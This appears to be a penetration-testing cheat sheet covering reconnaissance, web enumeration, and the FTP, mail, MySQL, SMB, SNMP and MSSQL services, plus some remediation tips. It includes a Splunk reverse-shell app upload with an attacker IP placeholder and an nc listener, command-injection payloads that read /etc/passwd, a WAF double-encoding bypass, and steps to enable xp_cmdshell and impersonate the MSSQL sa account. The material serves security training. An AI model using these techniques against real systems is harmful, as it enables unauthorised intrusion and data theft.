1. Passive Listen (Responder / tcpdump) (Run Responder in passive mode or tcpdump to observe broadcast traffic, discover hosts, and passively collect credentials before any active scanning)
2. Interface & Subnet Mapping (Identify your own IP and CIDR via ip a or ipconfig to define the scope)
3. Passive Neighbor Discovery (Check the local ARP cache via arp -a or ip neigh to see connected peers)
4. Active Host Discovery (Run nmap -sn <CIDR> or netdiscover to sweep the subnet via ARP/ICMP)
5. Role Identification (Scan live hosts for specific ports like 88/445/389 to distinguish DCs from workstations)
The following sections will detail how to enumerate various web appliations, which could lead to exploitation and access.
EyeWitness
For quick web application discovery.
# https://github.com/RedSiege/EyeWitnessgit clone https://github.com/RedSiege/EyeWitness.git && cd EyeWitness/setup
# cmake is already a part of build-essentialsed -i 's/cmake//gI' ./setup.sh
sudo ./setup.sh
cd ..
source eyewitness-venv/bin/activate
# SCAN using nmap XML results outputmkdir ../scan_eyewitness
python Python/EyeWitness.py --web -x ../scan_nmap_disc_all_ports.xml -d ../scan_eyewitness
Weak or null authentication are the most likely vectors
Splunk WebApp
sudo nmap -sV -p 8000,8089 <TARGET>
Uploading Callback Shell
<TARGET>/en-US/app/launcher/home
# Splunk Reverse Shellgit clone https://github.com/0xjpuff/reverse_shell_splunk.git
cd reverse_shell_splunk/reverse_shell_splunk/
# !!! UPDATE !!!# Change 'attacker_ip_here' and attacker_port_here in the respective script(s)cd ..
tar -cvzf updater.tar.gz reverse_shell_splunk/
nc -lvnp 8443# NOTE: uploading the app, causes it run immediately; ensure `nc` is running# From <TARGET>/en-US/manager/search/apps/local > Install app from file
PRTG Network Monitor
PRTG WebApp
sudo nmap -sV -p 80,443,8080 <TARGET>
curl -s <TARGET> | grep -i Version
osTicket
For some public facing services, one can acquire a valid, internal email by submitting a ticket, though this might require email activation.
Use a security plugin such as WordFence which includes security monitoring, blocking of suspicious activity, country blocking, two-factor authentication, and more
A plugin such as AdminExile can be used to require a secret key to log in to the Joomla admin page such as http://joomla.inlanefreight.local/administrator?thisismysecretkey
Limit access to the Tomcat Manager and Host-Manager applications to only localhost. If these must be exposed externally, enforce IP whitelisting and set a very strong password and non-standard username.
# Domain => Subdomains via Cert Registrycurl -s "https://crt.sh/?q=<DOMAIN>&output=json" | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u | tee subdomainlist.txt
# Full Info for i in $(cat subdomainlist.txt) ; do host $i | tee -a hostinfo.txt ; done# (IPv4) Domain Name => IP Addressfor i in $(cat subdomainlist.txt) ; do host $i | grep "has address" | cut -d" " -f1,4 | tee -a domain_ipaddress.txt ; done# (IPv4) Addresses Onlyfor i in $(cat domain_ipaddress.txt) ; do host $i | grep "has address" | cut -d" " -f4 | tee -a ip-addresses.txt ; done# (IPv4) Addresses => Services via Shodanfor i in $(cat ip-addresses.txt) ; do shodan host $i ; done# DNS: old techniquedig any <DOMAIN>
# Content Search: google.com Dorkinurl:<DOMAIN> intext:<TERM>
LLMNR & NBT-NS
UDP 5355: LLMNR (modern)
UDP 137: NBT-NS (ancient)
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that used as failover protocols when DNS is unavailable.
On a Windows, the box will attempt to resolve a hostname in this order:
Checks Local HOSTS file.
Checks DNS Cache / DNS Server.
(If DNS Fails): Sends LLMNR Multicast.
(If LLMNR Fails): Sends NBT-NS Broadcast.
Remediation
Typically, disabling LLMNR and NBT-NS can cautiously used (to ensure no breakages) at the network or host-level.
Disable LLMNR by:
Group Policy –>
Computer Configuration –>
Administrative Templates –>
Network –>
DNS Client
Enable “Turn OFF Multicast Name Resolution”
Disable NBT-NS (locally only on each host or via GPO w/ PowerShell):
Network and Sharing Center –>
Control Panel –>
Change adapter settings
Right-clicking on the adapter –> properties –>
Selecting Internet Protocol Version 4 (TCP/IPv4) –> Properties –> Advanced –> selecting the WINS tab
Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE?
# Connect to FTP server in passive mode with anonymous loginftp -p ftp://<USER>:<PASS>@<TARGET>
passive
# lftp equivalentslftp ftp://<USER>:<PASS>@<TARGET>
set ftp:passive-mode off
# Execute local commands (outside of session)!<COMMAND>
# List files and directoriesls -la
ls -laR
# Read fileget <FILENAME> -
# Download fileget <FILENAME>
# Upload fileput <FILENAME>
# Download all filesmirror .
# Download ALL filesmkdir ftp_files && cd ftp_files
wget -m --no-passive-ftp ftp://anonymous:anonymous@<TARGET>
1. Technology & Security Fingerprinting (Use whatweb and nikto to identify the server, frameworks, and WAF, and curl to inspect headers and robots.txt)
2. Content & vHost Discovery (Run feroxbuster or gobuster dir to bruteforce directories/files, and gobuster vhost to find hidden virtual hosts)
3. Automated Vulnerability Scanning (Use nikto or wapiti to scan for common misconfigurations and known vulnerabilities like outdated software)
4. Manual Application Testing (OWASP Top 10) (After automated scans, manually inspect the application for logical flaws, focusing on Injection, Broken Access Control, and XSS)
# NOTE: filter out by response size since an HTTP response of 200 OK will always be receivedffuf -ic -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -H 'Host: FUZZ.<DOMAIN>' -u http://<TARGET>/ -fs <SIZE>
# Add NEW vHosts to automatically resolve them laterecho '<IP_ADDR> <VHOST>.<FQDN>' | sudo tee -a /etc/hosts
# 1. Curl Auto-Encoding (GET Requests)# -G converts --data into a GET query string. --data-urlencode handles the special chars.curl -G -i "http://<TARGET>/cgi/welcome.bat" --data-urlencode "cmd=C:\windows\system32\whoami.exe & id"# 2. Python One-Liner (For generating payloads for Burp/Browser)python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))"'cat /etc/passwd & id'# 3. The "Slicker Way" (Add this to your ~/.zshrc or ~/.bashrc)alias urlencode='python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))"'# Usage: urlencode "payload&goes=here"
URL Encoding (Percent-Encoding) is not an obfuscation technique; it is a mechanical requirement of the HTTP protocol. You must encode characters to stop the Web Server from confusing your Payload Data with HTTP Syntax.
Character
HTTP Syntax Meaning
Why it breaks exploits if unencoded
&
Parameter Separator
Server splits your payload. ?cmd=id & whoami becomes Param 1: cmd=id, Param 2: whoami.
#
URL Fragment
Browser stops sending data after #. The backend never sees it.
+ /
Space
Raw spaces break the HTTP header structure (GET /page HTTP/1.1).
?
Query String Start
Truncates or confuses path traversal payloads.
The CGI / Command Injection Rule:
When exploiting CGI scripts (.sh, .bat, .cgi), the web server unwraps the URL and hands the raw string directly to the OS shell (/bin/bash or cmd.exe). If you do not URL-encode your shell operators (&, |, ;), the web server strips them out during the HTTP parsing phase, and the OS shell never executes them.
Double Encoding (WAF Bypass): If a WAF blocks %5C (\), encode the % symbol itself (% = %25). The payload becomes %255C. The WAF sees %255C (Allowed), passes it to the backend, which decodes it once to %5C, and the application decodes it again to \.
Space Variants:
In the URL Path (GET /path%20here), use %20.
In the Query String / Body (?cmd=id+whoami), + is historically interpreted as a space (application/x-www-form-urlencoded), but %20 is universally safer to avoid parsing desyncs. Default to %20.
This setting adjusts log verbosity, the submitted passwords, and the scheme gets logged.
auth_verbose
Logs unsuccessful authentication attempts and their reasons.
auth_verbose_passwords
Passwords used for authentication are logged and can also be truncated.
auth_anonymous_username
This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism.
# Enumeratesudo nmap -n -Pn -sV -sC -p25,110,143,465,587,993,995 <TARGET>
### Non-Interactive# IMAPScurl -vkL --user '<USER>':'<PASSWORD>''imaps://<TARGET>' -X <COMMAND>
# POP3Scurl -vkL --user '<USER>':'<PASSWORD>''pop3s://<TARGET>' -X <COMMAND>
### Interactive# IMAPSopenssl s_client -connect <TARGET>:imaps
1 LOGIN <USERNAME> <PASSWORD>
1 LIST "" * # Lists all directories1 SELECT "<MAILBOX>"# Selects a mailbox1 UNSELECT "<MAILBOX>"# Exits the selected mailbox1 FETCH <ID> all # Metadata of email1 FETCH 1:* (BODY[])# Show all emails1 CREATE "INBOX"# Creates a mailbox with a specified name1 DELETE "INBOX"# Deletes a mailbox1 RENAME "ToRead""Important"# Renames a mailbox1 LSUB "" * # Returns a subset of names from the set of names that the User has declared as being active or subscribed1 CLOSE # Removes all messages with the Deleted flag set1 LOGOUT # Closes the connection# POP3sopenssl s_client -connect <TARGET>:pop3s
USER <USERNAME>
PASS <PASSWORD>
STAT # List num of saved emails from the server.LIST # List number and size of all emails.RETR <ID> # Deliver the requested email by ID.DELE <ID> # Delete the requested email by ID.CAPA # Display the server capabilities.RSET # Reset the transmitted information.QUIT # Close connection
mysql - is the system database that contains tables that store information required by the MySQL server
information_schema - provides access to database metadata
performance_schema - is a feature for monitoring MySQL Server execution at a low level
sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
secure_file_priv may be set as follows:
If empty, the variable has no effect, which is not a secure setting.
If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
If set to NULL, the server disables import and export operations
-- Show Version
SELECT@@version ;
SELECTversion() ;
-- Show User
SELECTUSER()
SELECTCURRENT_USER()
SELECTuserfrom mysql.userSHOW databases ;
SHOW grants ;
-- Show if user is privileged
SELECT super_priv FROM mysql.userSELECT super_priv FROM mysql.userWHEREuser="root"-- Show user permissions
SELECT grantee,privilege_type FROM information_schema.user_privileges
SELECT grantee,privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- look for interesting perms like "FILE" to read/write files
-- Tables and metadata
USE sys ;
SELECThost,unique_users FROM sys.host_summary ;
USE <DATABASE> ;
SHOW tables ;
DESCRIBE<TABLE> ;
-- Write data
INSERTINTO<TABLE>VALUES (<COL1_VAL>, <COL2_VAL>, <COL3_VAL>, ...);
-- Get data
SELECT*FROM<TABLE>WHERE<COLUMN>="<VALUE>" ;
#WHERE x LIKE"%blah%" ;
SELECT*FROM<TABLE>WHERE<COLUMN>LIKE"%<VALUE>%"ORDERBY<COLUMN>ASC|DESCLIMIT<NUM> ;
-- Example COUNT
SELECTCOUNT(*) FROM<TABLE>WHERE<COLUMN1>>10000OR<COLUMN2>NOTLIKE'%<KEYWORD>%' ;
Enumeration
MySQL
These commands are specific though not necessarily exclusive to MySQL
Payload
When to Use
Expected Output
Wrong Output
SELECT @@version
When we have full query output
MySQL Version ‘i.e. 10.3.22-MariaDB-1ubuntu1’
In MSSQL it returns MSSQL version. Error with other DBMS.
# Show currently used database (if inside a query)SHOW database()USE information_schema ; # metadata# Get database namesSELECT schema_name FROM information_schema.schemata ;
# Show tablesSELECT table_name,table_schema FROM information_schema.tables where table_schema='<DATABASE>' ;
# Get columnsselect COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='<TABLE>' ;
# Finally read valuesSELECT <COLUMN> FROM <DATABASE>.<TABLE> ;
1. Anonymous Access & Share Listing (Attempt a null session via smbclient -L <IP> -N or crackmapexec smb <IP> --shares to list shares without credentials)
2. Comprehensive Enumeration (Run enum4linux-ng -A <IP> to automatically dump users, groups, OS info, and password policies)
3. Share Content Inspection (Mount accessible shares or use smbclient to browse directories for sensitive files, scripts, or backups)
4. Security Posture Check (Use nmap --script=smb-security-mode to verify if SMB signing is required, which is critical for preventing relay attacks)
Dangerous Settings
Setting
Description
browseable = yes
Allow listing available shares in the current share?
read only = no
Forbid the creation and modification of files?
writable = yes
Allow users to create and modify files?
guest ok = yes
Allow connecting to the service without using a password?
enable privileges = yes
Honor privileges assigned to specific SID?
create mask = 0777
What permissions must be assigned to the newly created files?
directory mask = 0777
What permissions must be assigned to the newly created directories?
logon script = script.sh
What script needs to be executed on the user’s login?
magic script = script.sh
Which script should be executed when the script gets closed?
magic output = script.out
Where the output of the magic script needs to be stored?
With this setting, this SMTP server can send fake emails and thus initialize communication between multiple parties. Another attack possibility would be to spoof the email and read it.
Management Information Base (MIB) is a text file of Object Identifier (OID) s, which provide addresses to access device info, in the Abstract Syntax Notation One (ASN.1) based ASCII text format. Community Strings are sort of “passwords” to manage the access level.
Dangerous Settings
Settings
Description
rwuser noauth
Provides access to the full OID tree without authentication.
rwcommunity <COMMUNITY_STRING> <IPv4_ADDR>
Provides access to the full OID tree regardless of where the requests were sent from.
rwcommunity6 <COMMUNITY_STRING> <IPv6_ADDR>
Same access as with rwcommunity with the difference of using IPv6.
# Enum via nmapsudo nmap -n -Pn -sU -p161 -sV --script 'snmp*' --reason -oA nmap_snmp_scan <TARGET>
### Brute-force names of Community Strings# - Default Strings: "public" (Read-Only) and "private" (Read/Write) are commononesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET>
// probably "public"### Brute-force OIDs and info# -v 1,2c,3snmpwalk -v <VERSION> -c <COMMUNITY_STRING> <TARGET> .1
### Brute-force OIDs# -2 : use v2# braa usu. uses Version 1braa <COMMUNITY_STRING>@<TARGET>:.1.*
braa <COMMUNITY_STRING>@<TARGET>:.1.3.6.*
master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that keeps system objects visible in every database on the server in sys schema.
tempdb - keeps temporary objects for SQL queries.
xp_cmdshell:
xp_cmdshell is a powerful feature and disabled by default. It can be enabled and disabled by using the Policy-Based Management or by executing sp_configure
The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account
xp_cmdshell operates synchronously. Control is not returned to the caller until the command-shell command is completed
Weak & default sa credentials. Admins may forget to disable this account
# Enumerate via nmapsudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=<USER>,mssql.password=<PASSWORD>,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET>
# Enumerate via MSFuse auxiliary/scanner/mssql/mssql_ping
set RHOSTS <TARGET>
run
### Login via Windows authimpacket-mssqlclient -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
impacket-mssqlclient <USER>:<PASSWORD>@<TARGET>
# SurveySELECT @@version;
SELECT user_name();
SELECT system_user;
SELECT IS_SRVROLEMEMBER('sysadmin'); -- 1+ is admin
# UsersSELECT name FROM master..syslogins;
# DatabasesSELECT name FROM master..sysdatabases;
# show tables ;USE <DATABASE> ;
SELECT name FROM sys.tables;
Read Files
SELECT*FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
enable_xp_cmdshell
-- These are the same as the above single command
EXECUTE sp_configure 'show advanced options', 1RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1RECONFIGURE
xp_cmdshell <COMMAND>-- or run linked server command
EXECUTE('xp_cmdshell ''<DOS_CMD>''') AT [<LINKED_SERVER>]
Impersonate User
SELECTdistinct b.name FROM sys.server_permissions a INNERJOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name ='IMPERSONATE' ;
GO-- Impersonating the SA User (admin)
USE master
EXECUTEAS LOGIN ='sa'-- Verify
SELECTSYSTEM_USERSELECT IS_SRVROLEMEMBER('sysadmin')
-- 0 is NOT admin